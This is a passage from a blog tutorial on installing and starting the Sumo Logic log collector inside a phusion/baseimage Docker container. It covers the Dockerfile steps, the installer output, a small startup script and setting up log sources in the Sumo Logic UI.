RUN dpkg -i sumocollector_19.91-2_amd64.deb  
RUN rm sumocollector_19.91-2_amd64.deb  

Install the debian package and clean up.

ADD .docker/sumo/sumo.conf /etc/sumo.conf  

Copy the newly created sumo.conf file to the place where the collector expects to find it.

Before we get to the last line, let’s pause. If you were able to catch the output from installing the collector, you saw something like:

Preparing to unpack sumocollector_19.91-2_amd64.deb ...
Unpacking sumocollector (1:19.91-2) ...
Setting up sumocollector (1:19.91-2) ...
configuring collector....
configuring collector to run as root
Detected Ubuntu:
Installing the SumoLogic Collector daemon using init.d..
 Adding system startup for /etc/init.d/collector ...
   /etc/rc0.d/K20collector -> ../init.d/collector
   /etc/rc1.d/K20collector -> ../init.d/collector
   /etc/rc6.d/K20collector -> ../init.d/collector
   /etc/rc2.d/S20collector -> ../init.d/collector
   /etc/rc3.d/S20collector -> ../init.d/collector
   /etc/rc4.d/S20collector -> ../init.d/collector
   /etc/rc5.d/S20collector -> ../init.d/collector
Collector has been successfully installed. Please provide account credential in /etc/sumo.conf and start it up via service or init.d script!

 

It was only after sifting through my docker output that I saw this and learned about the existence of a sumo.conf file. Before that, nothing was happening in the Sumo Logic UI because no collector had been correctly installed and started, even when I started the container. Anyway, we got /etc/sumo.conf out of the way, so what about starting it up “via service or init.d script”?

My solution was to include a simple bash script that starts the collector service on startup. But my Dockerfile extends phusion/baseimage-docker, which uses a custom init system. So the last Dockerfile command,

ADD .docker/sumo/start_sumo /etc/my_init.d/start_sumo  

adds a file called start_sumo like:

#!/bin/bash
service collector start  

into /etc/my_init.d. Make sure it’s executable with chmod +x. Like the conf file, this is saved into .docker/sumo/start_sumo of the app code repository.

I am very open to more elegant ways for getting the Sumo Logic collector to start. I’d also like to see how non-baseimage users deal with init requirements. I would have done this as a runit script as recommended by the baseimage-docker README, but the collector script appears to automatically daemonize itself, which breaks runit.

5. Build and Deploy!

I ran docker build and docker run as usual, and voilà! The newly installed collector popped up in Manage → Collectors.

6. Configure Sources

Before we start seeing logs, we have to tell Sumo what a log file is. I clicked Manage → Collectors → Add → Add Source and added a Local File entry that had the absolute path to a log file I was interested in. One of the Sumo Logic videos I watched noted that specifying /path/to/log/dir/** will pick up all log files in a directory.

sumo_logic_manage_collectors_screenshot

I waited a couple of minutes, and log messages started coming into the UI. Sweet! Keep in mind that multiple sources can be added for a single collector.


So far, I’ve learned that I can get a bird’s-eye view of all my logs from Manage → Status, and look at actual log messages from Search. I haven’t spent time really getting to know the various queries yet, but if they’re worth writing about, expect another post.

Possible Improvement: The above example installs Sumo Logic inside the app container. An alternate approach might have Sumo installed on the host (or in its own Docker container), reading log files from a shared data volume. This has the benefits of (1) requiring only a single Sumo Logic install for potentially more than one app container, and (2) architectural separation of app from log consumption.

That’s it! This turned out to be surprisingly simple. Kudos to Sumo Logic for offering an easy to use service + free tier that’s totally feasible for smallish apps.
